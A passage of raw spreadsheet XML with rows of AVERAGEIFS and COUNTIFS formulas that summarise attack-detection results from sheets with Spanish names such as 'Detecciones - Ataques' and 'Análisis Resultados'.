      </c>
      <c r="Y88" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z88" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB88" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC88" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD88" s="569">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
    </row>
    <row r="89">
      <c r="B89" s="806"/>
      <c r="C89" s="807"/>
      <c r="D89" s="808"/>
      <c r="E89" s="808"/>
      <c r="F89" s="808"/>
      <c r="G89" s="808"/>
      <c r="H89" s="809"/>
      <c r="I89" s="806"/>
      <c r="K89" s="352" t="s">
        <v>1040</v>
      </c>
      <c r="L89" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AQ$131)
</f>
        <v>0.3635338346</v>
      </c>
      <c r="M89" s="374">
        <f>'(D) - Análisis Resultados II - '!AF22</f>
        <v>1</v>
      </c>
      <c r="N89" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K89)</f>
        <v>5</v>
      </c>
      <c r="O89" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P89" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q89" s="569">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="T89" s="865" t="s">
        <v>1040</v>
      </c>
      <c r="U89" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AQ$131)
</f>
        <v>0.3635338346</v>
      </c>
      <c r="V89" s="69">
        <v>0.6</v>
      </c>
      <c r="W89" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T89)</f>
        <v>5</v>
      </c>
      <c r="X89" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y89" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z89" s="569">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="AB89" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC89" s="569">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AD89" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="90">
      <c r="B90" s="806"/>
      <c r="C90" s="807"/>
      <c r="D90" s="808"/>
      <c r="E90" s="808"/>
      <c r="F90" s="808"/>
      <c r="G90" s="808"/>
      <c r="H90" s="809"/>
      <c r="I90" s="806"/>
      <c r="K90" s="352" t="s">
        <v>1012</v>
      </c>
      <c r="L90" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="M90" s="374">
        <f>'(D) - Análisis Resultados II - '!AG22</f>
        <v>0.5</v>
      </c>
      <c r="N90" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K90)</f>
        <v>2</v>
      </c>
      <c r="O90" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P90" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q90" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T90" s="865" t="s">
        <v>1012</v>
      </c>
      <c r="U90" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="V90" s="69">
        <v>0.5</v>
      </c>
      <c r="W90" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T90)</f>
        <v>2</v>
      </c>
      <c r="X90" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y90" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z90" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB90" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC90" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD90" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="91">
      <c r="B91" s="806"/>
      <c r="C91" s="807"/>
      <c r="D91" s="808"/>
      <c r="E91" s="808"/>
      <c r="F91" s="808"/>
      <c r="G91" s="808"/>
      <c r="H91" s="809"/>
      <c r="I91" s="806"/>
      <c r="K91" s="352" t="s">
        <v>1164</v>
      </c>
      <c r="L91" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AR$131)
</f>
        <v>0.5</v>
      </c>
      <c r="M91" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!AH22</f>
        <v>-</v>
      </c>
      <c r="N91" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K91)</f>
        <v>0</v>
      </c>
      <c r="O91" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P91" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q91" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T91" s="865" t="s">
        <v>1164</v>
      </c>
      <c r="U91" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V91" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W91" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T91)</f>
        <v>0</v>
      </c>
      <c r="X91" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y91" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z91" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB91" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC91" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD91" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="92">
      <c r="B92" s="806"/>
      <c r="C92" s="807"/>
      <c r="D92" s="808"/>
      <c r="E92" s="808"/>
      <c r="F92" s="808"/>
      <c r="G92" s="808"/>
      <c r="H92" s="809"/>
      <c r="I92" s="806"/>
      <c r="K92" s="352" t="s">
        <v>1848</v>
      </c>
      <c r="L92" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AT$131)
</f>
        <v>0</v>
      </c>
      <c r="M92" s="374">
        <f>'(D) - Análisis Resultados II - '!AI22</f>
        <v>1</v>
      </c>
      <c r="N92" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K92)</f>
        <v>1</v>
      </c>
      <c r="O92" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P92" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q92" s="569">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="T92" s="865" t="s">
        <v>1848</v>
      </c>
      <c r="U92" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AT$131)
</f>
        <v>0</v>
      </c>
      <c r="V92" s="69">
        <v>0.0</v>
      </c>
      <c r="W92" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T92)</f>
        <v>1</v>
      </c>
      <c r="X92" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y92" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z92" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB92" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC92" s="569">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AD92" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="93">
      <c r="B93" s="806"/>
      <c r="C93" s="807"/>
      <c r="D93" s="808"/>
      <c r="E93" s="808"/>
      <c r="F93" s="808"/>
      <c r="G93" s="808"/>
      <c r="H93" s="809"/>
      <c r="I93" s="806"/>
      <c r="K93" s="352" t="s">
        <v>2300</v>
      </c>
      <c r="L93" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AU$131)
</f>
        <v>1</v>
      </c>
      <c r="M93" s="374">
        <f>'(D) - Análisis Resultados II - '!AJ22</f>
        <v>1</v>
      </c>
      <c r="N93" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K93)</f>
        <v>1</v>
      </c>
      <c r="O93" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P93" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q93" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T93" s="865" t="s">
        <v>2300</v>
      </c>
      <c r="U93" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AU$131)
</f>
        <v>1</v>
      </c>
      <c r="V93" s="69">
        <v>1.0</v>
      </c>
      <c r="W93" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T93)</f>
        <v>1</v>
      </c>
      <c r="X93" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y93" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z93" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB93" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC93" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD93" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="94">
      <c r="B94" s="806"/>
      <c r="C94" s="807"/>
      <c r="D94" s="808"/>
      <c r="E94" s="808"/>
      <c r="F94" s="808"/>
      <c r="G94" s="808"/>
      <c r="H94" s="809"/>
      <c r="I94" s="806"/>
      <c r="K94" s="352" t="s">
        <v>1138</v>
      </c>
      <c r="L94" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AV$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="M94" s="374">
        <f>'(D) - Análisis Resultados II - '!AK22</f>
        <v>1</v>
      </c>
      <c r="N94" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K94)</f>
        <v>1</v>
      </c>
      <c r="O94" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P94" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q94" s="569">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="T94" s="865" t="s">
        <v>1138</v>
      </c>
      <c r="U94" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AV$131)
</f>
        <v>0.6666666667</v>
      </c>
      <c r="V94" s="69">
        <v>0.3333333333333333</v>
      </c>
      <c r="W94" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T94)</f>
        <v>1</v>
      </c>
      <c r="X94" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y94" s="569">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="Z94" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB94" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC94" s="569">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AD94" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="95">
      <c r="B95" s="806"/>
      <c r="C95" s="807"/>
      <c r="D95" s="808"/>
      <c r="E95" s="808"/>
      <c r="F95" s="808"/>
      <c r="G95" s="808"/>
      <c r="H95" s="809"/>
      <c r="I95" s="806"/>
      <c r="K95" s="352" t="s">
        <v>974</v>
      </c>
      <c r="L95" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M95" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!AL22</f>
        <v>-</v>
      </c>
      <c r="N95" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K95)</f>
        <v>0</v>
      </c>
      <c r="O95" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P95" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q95" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T95" s="865" t="s">
        <v>974</v>
      </c>
      <c r="U95" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V95" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W95" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T95)</f>
        <v>0</v>
      </c>
      <c r="X95" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y95" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z95" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB95" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC95" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD95" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="96">
      <c r="B96" s="806"/>
      <c r="C96" s="807"/>
      <c r="D96" s="808"/>
      <c r="E96" s="808"/>
      <c r="F96" s="808"/>
      <c r="G96" s="808"/>
      <c r="H96" s="809"/>
      <c r="I96" s="806"/>
      <c r="K96" s="352" t="s">
        <v>1108</v>
      </c>
      <c r="L96" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AX$131)
</f>
        <v>1</v>
      </c>
      <c r="M96" s="374">
        <f>'(D) - Análisis Resultados II - '!AM22</f>
        <v>0.8888888889</v>
      </c>
      <c r="N96" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K96)</f>
        <v>1</v>
      </c>
      <c r="O96" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P96" s="569">
        <f t="shared" si="4"/>
        <v>1</v>
      </c>
      <c r="Q96" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T96" s="865" t="s">
        <v>1108</v>
      </c>
      <c r="U96" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AX$131)
</f>
        <v>1</v>
      </c>
      <c r="V96" s="69">
        <v>0.0</v>
      </c>
      <c r="W96" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T96)</f>
        <v>1</v>
      </c>
      <c r="X96" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y96" s="569">
        <f t="shared" si="7"/>
        <v>1</v>
      </c>
      <c r="Z96" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB96" s="860" t="b">
        <f t="shared" si="9"/>
        <v>0</v>
      </c>
      <c r="AC96" s="569">
        <f t="shared" si="10"/>
        <v>1</v>
      </c>
      <c r="AD96" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="97">
      <c r="B97" s="806"/>
      <c r="C97" s="807"/>
      <c r="D97" s="808"/>
      <c r="E97" s="808"/>
      <c r="F97" s="808"/>
      <c r="G97" s="808"/>
      <c r="H97" s="809"/>
      <c r="I97" s="806"/>
      <c r="K97" s="352" t="s">
        <v>1702</v>
      </c>
      <c r="L97" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M97" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!AN22</f>
        <v>-</v>
      </c>
      <c r="N97" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K97)</f>
        <v>0</v>
      </c>
      <c r="O97" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P97" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q97" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T97" s="865" t="s">
        <v>1702</v>
      </c>
      <c r="U97" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V97" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W97" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T97)</f>
        <v>0</v>
      </c>
      <c r="X97" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y97" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z97" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB97" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC97" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD97" s="569">
        <f t="shared" si="11"/>
        <v>1</v>
      </c>
    </row>
    <row r="98">
      <c r="B98" s="806"/>
      <c r="C98" s="807"/>
      <c r="D98" s="808"/>
      <c r="E98" s="808"/>
      <c r="F98" s="808"/>
      <c r="G98" s="808"/>
      <c r="H98" s="809"/>
      <c r="I98" s="806"/>
      <c r="K98" s="352" t="s">
        <v>1626</v>
      </c>
      <c r="L98" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="M98" s="374">
        <f>'(D) - Análisis Resultados II - '!AO22</f>
        <v>1</v>
      </c>
      <c r="N98" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K98)</f>
        <v>2</v>
      </c>
      <c r="O98" s="860" t="b">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
      <c r="P98" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q98" s="569">
        <f t="shared" si="5"/>
        <v>1</v>
      </c>
      <c r="T98" s="865" t="s">
        <v>1626</v>
      </c>
      <c r="U98" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!AZ$131)
</f>
        <v>0.5</v>
      </c>
      <c r="V98" s="69">
        <v>1.0</v>
      </c>
      <c r="W98" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T98)</f>
        <v>2</v>
      </c>
      <c r="X98" s="860" t="b">
        <f t="shared" si="6"/>
        <v>0</v>
      </c>
      <c r="Y98" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z98" s="569">
        <f t="shared" si="8"/>
        <v>1</v>
      </c>
      <c r="AB98" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC98" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD98" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="99">
      <c r="B99" s="806"/>
      <c r="C99" s="868"/>
      <c r="D99" s="869"/>
      <c r="E99" s="869"/>
      <c r="F99" s="869"/>
      <c r="G99" s="869"/>
      <c r="H99" s="870"/>
      <c r="I99" s="806"/>
      <c r="K99" s="552" t="s">
        <v>636</v>
      </c>
      <c r="L99" s="863">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BA$131)
</f>
        <v>0</v>
      </c>
      <c r="M99" s="374">
        <f>'(D) - Análisis Resultados II - '!AP22</f>
        <v>0</v>
      </c>
      <c r="N99" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K99)</f>
        <v>1</v>
      </c>
      <c r="O99" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P99" s="569">
        <f t="shared" si="4"/>
        <v>0</v>
      </c>
      <c r="Q99" s="569">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="T99" s="866" t="s">
        <v>636</v>
      </c>
      <c r="U99" s="862">
        <f>AVERAGEIFS('(B) - Detecciones - Ataques'!$GJ$3:$GJ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139, "✔",'(B) - Detecciones - Ataques'!$E$3:$E$139, '(D) - Análisis Resultados I - S'!BA$131)
</f>
        <v>0</v>
      </c>
      <c r="V99" s="69">
        <v>0.0</v>
      </c>
      <c r="W99" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T99)</f>
        <v>1</v>
      </c>
      <c r="X99" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y99" s="569">
        <f t="shared" si="7"/>
        <v>0</v>
      </c>
      <c r="Z99" s="569">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="AB99" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC99" s="569">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="AD99" s="569" t="str">
        <f t="shared" si="11"/>
        <v>-</v>
      </c>
    </row>
    <row r="100">
      <c r="B100" s="806"/>
      <c r="C100" s="806"/>
      <c r="D100" s="806"/>
      <c r="E100" s="806"/>
      <c r="F100" s="806"/>
      <c r="G100" s="806"/>
      <c r="H100" s="806"/>
      <c r="I100" s="806"/>
      <c r="K100" s="352" t="s">
        <v>1726</v>
      </c>
      <c r="L100" s="867" t="s">
        <v>12</v>
      </c>
      <c r="M100" s="374" t="str">
        <f>'(D) - Análisis Resultados II - '!AQ22</f>
        <v>-</v>
      </c>
      <c r="N100" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,K100)</f>
        <v>0</v>
      </c>
      <c r="O100" s="860" t="b">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
      <c r="P100" s="569" t="str">
        <f t="shared" si="4"/>
        <v>-</v>
      </c>
      <c r="Q100" s="569" t="str">
        <f t="shared" si="5"/>
        <v>-</v>
      </c>
      <c r="T100" s="865" t="s">
        <v>1726</v>
      </c>
      <c r="U100" s="866" t="s">
        <v>12</v>
      </c>
      <c r="V100" s="69" t="s">
        <v>12</v>
      </c>
      <c r="W100" s="859">
        <f>COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,T100)</f>
        <v>0</v>
      </c>
      <c r="X100" s="860" t="b">
        <f t="shared" si="6"/>
        <v>1</v>
      </c>
      <c r="Y100" s="569" t="str">
        <f t="shared" si="7"/>
        <v>-</v>
      </c>
      <c r="Z100" s="569" t="str">
        <f t="shared" si="8"/>
        <v>-</v>
      </c>
      <c r="AB100" s="860" t="b">
        <f t="shared" si="9"/>
        <v>1</v>
      </c>
      <c r="AC100" s="569" t="str">
        <f t="shared" si="10"/>
        <v>-</v>
      </c>
      <c r="AD100" s="569">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
    </row>
    <row r="101">
      <c r="B101" s="806"/>
      <c r="C101" s="806"/>
      <c r="D101" s="806"/>
      <c r="E101" s="806"/>
      <c r="F101" s="806"/>
      <c r="G101" s="806"/>
      <c r="H101" s="806"/>
      <c r="I101" s="806"/>
      <c r="K101" s="352" t="s">
        <v>822</v>
      </c>
      <c r="L101" s="863">
